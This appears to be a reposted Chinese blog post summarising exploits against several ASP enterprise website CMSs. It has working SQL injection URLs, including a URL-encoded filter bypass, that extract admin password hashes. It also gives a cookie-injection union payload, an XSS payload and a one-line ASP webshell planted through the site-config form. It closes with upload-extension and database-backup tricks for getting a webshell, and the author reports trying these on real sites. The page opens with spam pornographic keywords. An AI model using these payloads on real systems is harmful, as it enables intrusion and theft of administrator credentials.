韩国大尺度床戏激情戏裸戏电影_麻豆免费播放_激情引诱h文_久久www视频

南方數(shù)據(jù)、良精、網(wǎng)軟天下等企業(yè)管理系統(tǒng)漏洞總結(jié)(轉(zhuǎn))

[重要通告]如您遇疑難雜癥,本站支持知識付費(fèi)業(yè)務(wù),掃右邊二維碼加博主微信,可節(jié)省您寶貴時間哦!

南方數(shù)據(jù)、良精、網(wǎng)軟天下等企業(yè)管理系統(tǒng)漏洞總結(jié)

一、
在分析useredit.asp的時候,發(fā)現(xiàn)這樣幾句:

dim Action,UserName,FoundErr,ErrMsg dim rsUser,sqlUser Action=trim(request("Action")) UserName=trim(request("UserName")) if UserName="" then UserName=session("UserName") end if if UserName="" then if Action="" then response.redirect "UserServer.asp" else FoundErr=True ErrMsg=ErrMsg & "<br><li>參數(shù)不足!</li>" end if end if if FoundErr=true then call WriteErrMsg() else Set rsUser=Server.CreateObject("Adodb.RecordSet") sqlUser="select * from [User] where UserName='" & UserName & "'"

很明顯,username的值未經(jīng)過任何過濾。本來他是用username來獲取session用戶名來進(jìn)行用戶資料的,可惜前面加了request("username"),這在我看來無任何意義,不知道寫程序的人什么用意。。

根據(jù)管理員表,我構(gòu)建了以下語句來測試: http://localhost/nf/useredit.asp?username=admin'%20and%20exists%20(select%20Password%20from%20[Admin]) 結(jié)果返回錯誤:一想,對了,是字符型:再來: http://localhost/nf/useredit.asp?username=admin'%20and%20exists%20(select%20Password%20from%20[Admin]) and ''=' 返回正常用戶資料編輯頁面,OK~無任何問題,再來: http://localhost/nf/useredit.asp?username=admin'%20and%20exists%20(select%20Password%20from%20[Admin]%20where%20left(password,1)='3')%20and%20''=' 返回正常 剩下的我也就不多說,結(jié)果用它測試官方的站,也是一樣存在此漏洞,順利拿到MD5密碼后,準(zhǔn)備進(jìn)后臺一看,但是官方演示站沒有上傳后臺,只能看看了。(BS..)

修補(bǔ)漏洞也極其簡單:

UserName=trim(request("UserName"))

此行下面再加幾句過濾一下: UserName=Replace(UserName,"'","") UserName=Replace(UserName,"%","") UserName=Replace(UserName," ","") UserName=Replace(UserName,"exists","") UserName=Replace(UserName,"select","")

就可以了!

-----------------------------------------------------------------------------------------------------------------------------------

渥洞二:
出現(xiàn)漏洞的文件是upfile_Other.asp,我們來看看它的問題語句吧!
<%
if EnableUploadFile="NO" then
response.write "系統(tǒng)未開放文件上傳功能"
else
if session("AdminName")="" and session("UserName")="" then
response.Write("請登錄后再使用本功能!")
else
select case upload_type
case 0
call upload_0() ''使用化境無組件上傳類
case else
''response.write "本系統(tǒng)未開放插件功能"
''response.end
end select
end if
end if
%>
EnableUploadFile代表上傳文件是否開起,問題在這里
session("AdminName")="" and session("UserName")=""
這個文件的session不僅給管理員用還給普通的用戶用,可是前臺的用戶根本用不上這個,
這就導(dǎo)致了動畫里的成功入侵網(wǎng)站。
補(bǔ)救的方法就是先把a(bǔ)nd session("UserName")="" 給去掉。

-----------------------------------------------------------------------------------------------------------------------------------

發(fā)現(xiàn)Aboutus.asp頁面中的注入漏洞.
<!--#include file="Inc/SysProduct.asp" --> '調(diào)用函數(shù)文件來驗(yàn)證和判斷.
<!--#include file="inc/Skin_css.asp"--> '調(diào)用式樣文件.無用的,不管他
<!-- #include file="Head.asp" --> '頭部頁面,丟開.
<%Title=Trim(request("Title")) '顯示標(biāo)題
Set rs = Server.CreateObject("ADODB.Recordset") '運(yùn)行組件
sql="select Content from Aboutus where Title='"&Title&"'" '查詢語句..不管這里,繼續(xù)看下面
rs.open sql,conn,1,3
………… '后面的省略
<%
Set rslist = Server.CreateObject("ADODB.Recordset") '運(yùn)行組件
sql="select Title from Aboutus order by Aboutusorder" 'SQL開始查詢.
rslist.open sql,conn,1,3 '把查詢結(jié)果寫入rslist記錄集.
do while not rslist.eof
%>
<a href="Aboutus.asp?Title=<%=rslist("Title")%>"><%=rslist("Title")%> '關(guān)鍵在這里.
………… '省略
%>

Aboutus.asp?Title=<%=rslist("Title")%>"><%=rslist("Title")%>

Inc/SysProduct.asp里面調(diào)用了Check_Sql.ASP進(jìn)行SQL注入防護(hù).
其實(shí)這個頁面并沒有做任何過濾..雖然調(diào)用了CHECK_SQL.ASP來阻止注入.
但是他沒有過濾URL編碼.
本地搭建測試下.
http://localhost/aboutus.asp?title=%20%31%27 '錯誤
http://localhost/aboutus.asp?title=%20%31%20%61%6E%64%20%31%3D%31 '正常
http://localhost/aboutus.asp?title=%31%20%61%6E%64%20%31%3D%32 '錯誤

可以注入了.
查管理員密碼
http://localhost/aboutus.asp?title=%31%20%61%6E%64%20%65%78%69%73%74%73%20%28%73%65%6C%65%63%74%20%69%64%20%66%72%6F%6D%20%

75%73%65%72%73%20%77%68%65%72%65%20%6C%65%6E%28%75%73%65%72%70%77%64%29%3D%31%36%20%61%6E%64%20%75%73%65%72%69%64%3D%31%29
大家可以自己用Encode轉(zhuǎn)換SQL語句查詢..

-----------------------------------------------------------------------------------------------------------------------------------
另外一處XSS漏洞

這個漏洞出在Download.asp
<!--#include file="Inc/SysDown.asp" -->
<!--#include file="inc/Skin_css.asp"-->
<%
MaxPerPage=MaxPerPage_Default
strFileName="download.asp?BigClassName=" & BigClassName & "&SmallClassName=" & SmallClassName
%>
看到了吧..
沒調(diào)用任何過濾文件.而且輸出的BigClassName也沒有做任何過濾.
http://localhost/download.asp?BigClassName=<script>alert('Test..By:黑**')</script>
加密下
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%54%65%73%74%2E%2E%42%79%3A%BA%DA%2A%2A%27%29%3C%2F%73%63%72%69%70%74%3E
一樣可以正常輸出..

就到這里了吧.本人小菜一個.大俠飄過.感謝小拘同學(xué)提供了思路.

二、
網(wǎng)軟天下企業(yè)網(wǎng)站管理系統(tǒng)很多參數(shù)都是直接用request("id") 來接收參數(shù),為什么他們那么放心呢?原來他們都包含了一個非常流行.很多ASP程序里都用的防注入代碼,真的只需在有參數(shù)提交的文件中include防注入文件就是了安全嗎?我們來看看這個防注入文件。

Check_Sql.asp
<%
Dim Query_Badword,Form_Badword,i,Err_Message,Err_Web,name
'------定義部份 頭----------------------------------------------------------------------
Err_Message = 1 '處理方式:1=提示信息,2=轉(zhuǎn)向頁面,3=先提示再轉(zhuǎn)向
Err_Web = "Err.Asp" '出錯時轉(zhuǎn)向的頁面
Query_Badword="'∥and∥select∥update∥chr∥delete∥%20from∥;∥insert∥mid∥master.∥set∥chr(37)∥="
'在這部份定義get非法參數(shù),使用"∥"號間隔
Form_Badword="'∥%∥&∥*∥#∥(∥)∥="? ???'在這部份定義post非法參數(shù),使用"∥"號間隔
'------定義部份 尾-----------------------------------------------------------------------
'
On Error Resume Next
'----- 對 get query 值 的過濾.
if request.QueryString<>"" then //request.QueryString
Chk_badword=split(Query_Badword,"∥") //用split()把參數(shù)分割了
FOR EACH Query_Name IN Request.QueryString
for i=0 to ubound(Chk_badword)
If Instr(LCase(request.QueryString(Query_Name)),Chk_badword(i))<>0 Then //呵呵,他們還沒有低級到連LCase()都不用!
Select Case Err_Message
Case "1"
Response.Write "<Script Language=JavaScript>alert('傳參錯誤!參數(shù) "&name&" 的值中包含非法字符串!\n\n請不要在參數(shù)中出現(xiàn):and update delete ; insert mid master 等非法字符!');window.close();</Script>"
Case "2"
Response.Write "<Script Language=JavaScript>location.href='"&Err_Web&"'</Script>"
Case "3"
Response.Write "<Script Language=JavaScript>alert('傳參錯誤!參數(shù) "&name&"的值中包含非法字符串!\n\n請不要在參數(shù)中出現(xiàn):and update delete ; insert mid master 等非法字符!');location.href='"&Err_Web&"';</Script>"
End Select
Response.End
End If
NEXT
NEXT
End if
'-----對 post 表 單值的過濾.
if request.form<>"" then //request.form
Chk_badword=split(Form_Badword,"∥")
FOR EACH name IN Request.Form
for i=0 to ubound(Chk_badword)
If Instr(LCase(request.form(name)),Chk_badword(i))<>0 Then
Select Case Err_Message
Case "1"
Response.Write "<Script Language=JavaScript>alert('出錯了!表單 "&name&" 的值中包含非法字符串!\n\n請不要在表單中出現(xiàn): % & * # ( ) 等非法字符!');window.close();</Script>"
Case "2"
Response.Write "<Script Language=JavaScript>location.href='"&Err_Web&"'</Script>"
Case "3"
Response.Write "<Script Language=JavaScript>alert('出錯了!參數(shù) "&name&"的值中包含非法字符串!\n\n請不要在表單中出現(xiàn): % & * # ( ) 等非法字符!');location.href='"&Err_Web&"';</Script>"
End Select
Response.End
End If
NEXT
NEXT
end if
%>
它遍歷GET和POST中很多危險的參數(shù),常用來獲得數(shù)據(jù)的有兩種方式:一種就是:GET方式(Request.QueryString)另一種就是:表單POST提交的數(shù)據(jù)(Request. Form)和Cookies(Request.Cookies),而上面的防注入只是對Request對象的QueryString和From集合進(jìn)行過濾,卻忽略了Request.Cookies 可愛的注入出現(xiàn)了,我們可以用cookie注入來得到管理員的密碼帳號 。這里我們不僅僅可以注入,也可以跨站,這樣的防注入形同虛設(shè)。
注入漏洞
下面我們來測試一下:我們就來
利用shownews.asp 在地址欄中打開http://127.0.0.1/shownews.asp?id=1 清空地址欄,利用union語句來注入,提交:javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin")) 提交后我們訪問
http://127.0.0.1/shownews.asp 在頁面中直接返回了管理員的帳號和16位MD5加密的密碼,這樣我們就已經(jīng)成功拿到了管理員的帳號和密碼。

三、后臺的利用
(1)在系統(tǒng)管理中的網(wǎng)站配置中插入一句話馬:進(jìn)入后臺后,點(diǎn)左邊的”系統(tǒng)管理”再點(diǎn)擊”網(wǎng)站配置”在右邊的”網(wǎng)站名稱”(也可以在其它處)后加入"%><%Eval(Request(chr(112)))%><%',再點(diǎn)保存配置,如圖15:

然后我們打開inc/config.asp文件,看到一句話馬已寫入到配置文件中了,圖16:

這時再打開一句話馬的客戶端,提交同樣得到一個小馬.圖17:

(注:以下均在其它網(wǎng)站上測試所截的圖,為防止信息泄漏,未截留網(wǎng)站連接,請諒解!)

(2)后臺上傳漏洞,在Upfile_Photo.asp文件中部分代碼如下:

以下是代碼片段:

if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then

EnableUpload=false

end if

if EnableUpload=false then

msg="這種文件類型不允許上傳!\n\n只允許上傳這幾種文件類型:" & UpFileType

FoundErr=true

end if

大家可以看到程序只限制了對"asp","asa","aspx"類的文件上傳,我們只要在”網(wǎng)站配置”的允許的上傳文件類型處增加上傳”cer”等被服務(wù)器可解析的文件類型就可,由于我下載的是測試版本,無法在自己機(jī)子上測試,不過登陸了使用這系統(tǒng)的另一網(wǎng)站后臺后,成功上傳了”cer”后綴的文件后,如圖18,圖19:


提交時卻顯示下載頁面 ,上傳其它如”htr,cdx”等后綴文件時,提交時服務(wù)器卻不請求(只能說運(yùn)氣不好吧)
(3)后臺備份,直接在”產(chǎn)品管理”下的添加產(chǎn)品中上傳jpg后綴的asp馬,再到”系統(tǒng)管理”下的數(shù)據(jù)庫備份,在”當(dāng)前數(shù)據(jù)庫路徑”欄填入上傳的路徑,在” 備份數(shù)據(jù)庫名稱”填入你要備份馬的名稱,不過系統(tǒng)會在名稱后自動添加上.asa的,圖20:

點(diǎn)”確定”后提示”備份數(shù)據(jù)庫成功….”不過實(shí)際文件是沒有.asa的如圖21:

直接訪問備份后的地址,就得到一個webshell如圖22

問題未解決?付費(fèi)解決問題加Q或微信 2589053300 (即Q號又微信號)右上方掃一掃可加博主微信

所寫所說,是心之所感,思之所悟,行之所得;文當(dāng)無敷衍,落筆求簡潔。 以所舍,求所獲;有所依,方所成!

支付寶贊助
微信贊助

免責(zé)聲明,若由于商用引起版權(quán)糾紛,一切責(zé)任均由使用者承擔(dān)。

您必須遵守我們的協(xié)議,如您下載該資源,行為將被視為對《免責(zé)聲明》全部內(nèi)容的認(rèn)可->聯(lián)系老梁投訴資源
LaoLiang.Net部分資源來自互聯(lián)網(wǎng)收集,僅供用于學(xué)習(xí)和交流,請勿用于商業(yè)用途。如有侵權(quán)、不妥之處,請聯(lián)系站長并出示版權(quán)證明以便刪除。 敬請諒解! 侵權(quán)刪帖/違法舉報/投稿等事物聯(lián)系郵箱:service@laoliang.net
意在交流學(xué)習(xí),歡迎贊賞評論,如有謬誤,請聯(lián)系指正;轉(zhuǎn)載請注明出處: » 南方數(shù)據(jù)、良精、網(wǎng)軟天下等企業(yè)管理系統(tǒng)漏洞總結(jié)(轉(zhuǎn))

發(fā)表回復(fù)

本站承接,網(wǎng)站推廣(SEM,SEO);軟件安裝與調(diào)試;服務(wù)器或網(wǎng)絡(luò)推薦及配置;APP開發(fā)與維護(hù);網(wǎng)站開發(fā)修改及維護(hù); 各財務(wù)軟件安裝調(diào)試及注冊服務(wù)(金蝶,用友,管家婆,速達(dá),星宇等);同時也有客戶管理系統(tǒng),人力資源,超市POS,醫(yī)藥管理等;

立即查看 了解詳情